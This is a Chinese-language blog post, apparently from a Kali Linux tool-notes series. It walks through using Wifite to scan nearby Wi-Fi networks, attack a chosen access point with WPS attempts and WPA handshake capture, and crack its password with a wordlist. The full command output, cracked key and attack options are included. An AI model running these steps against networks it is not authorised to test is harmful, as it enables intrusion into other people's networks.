iT邦幫忙

2021 iThome 鐵人賽

DAY 27
1
Security

Kali Linux 工具筆記系列 第 27

Day 27 Wireless Attacks - 無線攻擊 (Wifite)

今天要來體驗的工具是Wifite,標榜只要簡單的指令,不需繁瑣的步驟或額外的參數就能自動完成掃描、破解wifi密碼,且支援WEP、WPA 和 WPS多種標準。話不多說,直接開始體驗吧

Wifite位於Kali的06-Wireless Attacks分類,直接執行可以看到使用方式

sudo wifite

結果可以拆成幾個區塊來看,第一塊顯示了工具的基本資訊,包含了版本、作者等等,然後有些過程建議備有的套件如果沒裝也會列出

   .               .    
 .´  ·  .     .  ·  `.  wifite2 2.5.2
 :  :  :  (¯)  :  :  :  a wireless auditor by @derv82
 `.  ·  ` /¯\ ´  ·  .´  maintained by kimocoder
   `     /¯¯¯\     ´    https://github.com/kimocoder/wifite2

 [!] Warning: Recommended app bully was not found. install @ https://github.com/aanarchyy/bully
 [!] Warning: Recommended app pyrit was not found. install @ https://github.com/JPaulMora/Pyrit/wiki
 [!] Warning: Recommended app hashcat was not found. install @ https://hashcat.net/hashcat/
 [!] Warning: Recommended app hcxdumptool was not found. install @ https://github.com/ZerBea/hcxdumptool
 [!] Warning: Recommended app hcxpcaptool was not found. install @ https://github.com/ZerBea/hcxtools
 [!] Warning: Recommended app macchanger was not found. install @ apt-get install macchanger

接下來這塊資訊顯示了介面進入監看模式,所以結束了NetworkManger process

 [!] Conflicting processes: avahi-daemon (PID 635), NetworkManager (PID 640), wpa_supplicant (PID 673), avahi-daemon (PID 698)
 [!] If you have problems: kill -9 PID or re-run wifite with --kill
 [+] Using wlp2s0mon already in monitor mode 

然後就會進入掃描階段,可以在中途Ctrl + C來中斷掃描,然後Wifite會詢問目標是哪個,這邊我輸入的是3,也就是Treekey那台

   NUM                      ESSID   CH  ENCR   POWER  WPS?  CLIENT                               
   ---  -------------------------  ---  -----  -----  ----  ------
     1                  ken-2.4G     1  WPA-P   43db    no                                       
     2                 cheng1230     6  WPA-P   43db    no                                       
     3                   Treekey    13  WPA-P   22db  lock    1                                 
     4                     LIANG    11  WPA-P   22db    no                                       
     5                  chandler     6  WPA-P   22db    no                                       
     6                 ASUS 2.4G     6  WPA-P   17db  lock                                       
     7                     dong4     1  WPA-P   16db   yes                                       
     8          huangfamily-2.4G     1  WPA-P   16db   yes                                                                                                                                       
 [+] select target(s) (1-16) separated by commas, dashes or all: 3      

接著就是一連串的破解過程,最後會產出.cap以及cracked.txt,可以看到有破解出密碼111111

[+] (1/1) Starting attacks against AA:AA:AA:AA:AA:AA (Treekey)
[+] Treekey (50db) WPS Pixie-Dust: [4m56s] Failed: Because access point is Locked               
[+] Treekey (54db) WPS NULL PIN: [4m56s] Failed: Because access point is Locked                 
[+] Treekey (44db) WPS PIN Attack: [5s] Failed: Because access point is Locked                 
[!] Skipping PMKID attack, missing required tools: hcxdumptool, hcxpcaptool
[+] Treekey (47db) WPA Handshake capture: Discovered new client: AA:AA:AA:AA:AA:AA             
[+] Treekey (45db) WPA Handshake capture: Captured handshake                                   
[+] saving copy of handshake to hs/handshake_Treekey_2021-10-12T21-22-06.cap saved

[+] analysis of captured handshake file:
[+]   tshark: .cap file contains a valid handshake for AA:AA:AA:AA:AA:AA
[!] aircrack: .cap file does not contain a valid handshake
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.01% ETA: 1m47s @ 1898.7kps (current key: 11111111)               
[+] Cracked WPA Handshake PSK: 11111111

[+]   Access Point Name: Treekey
[+]  Access Point BSSID: AA:AA:AA:AA:AA:AA
[+]          Encryption: WPA
[+]      Handshake File: hs/handshake_Treekey_2021-10-12T21-22-06.cap
[+]      PSK (password): 11111111
[+] saved crack result to cracked.txt (1 total)
[+] Finished attacking 1 target(s), exiting

以上是最簡易的Wifite最簡易的用法,其他用法可以參考wifite -h,像是針對特定模式

WEP:
  --wep                                      Show only WEP-encrypted networks
  --require-fakeauth                         Fails attacks if fake-auth fails (default: off)
  --keep-ivs                                 Retain .IVS files and reuse when cracking (default: off)

WPA:
  --wpa                                      Show only WPA-encrypted networks (includes WPS)
  --new-hs                                   Captures new handshakes, ignores existing handshakes in hs (default:
                                             off)
  --dict [file]                              File containing passwords for cracking (default: /usr/share/dict/wordlist-
                                             probable.txt)                                                                                                                                                                                   

WPS:
  --wps                                      Show only WPS-enabled networks
  --wps-only                                 Only use WPS PIN & Pixie-Dust attacks (default:
                                             off)
  --bully                                    Use bully program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --reaver                                   Use reaver program for WPS PIN & Pixie-Dust attacks (default:
                                             reaver)
  --ignore-locks                             Do not stop WPS PIN attack if AP becomes locked (default:
                                             stop)


上一篇
Day 26 Wireless Attacks - 無線攻擊 (aircrack-ng)
下一篇
Day 28 Exploitation Tools (searchsploit)
系列文
Kali Linux 工具筆記31

尚未有邦友留言

立即登入留言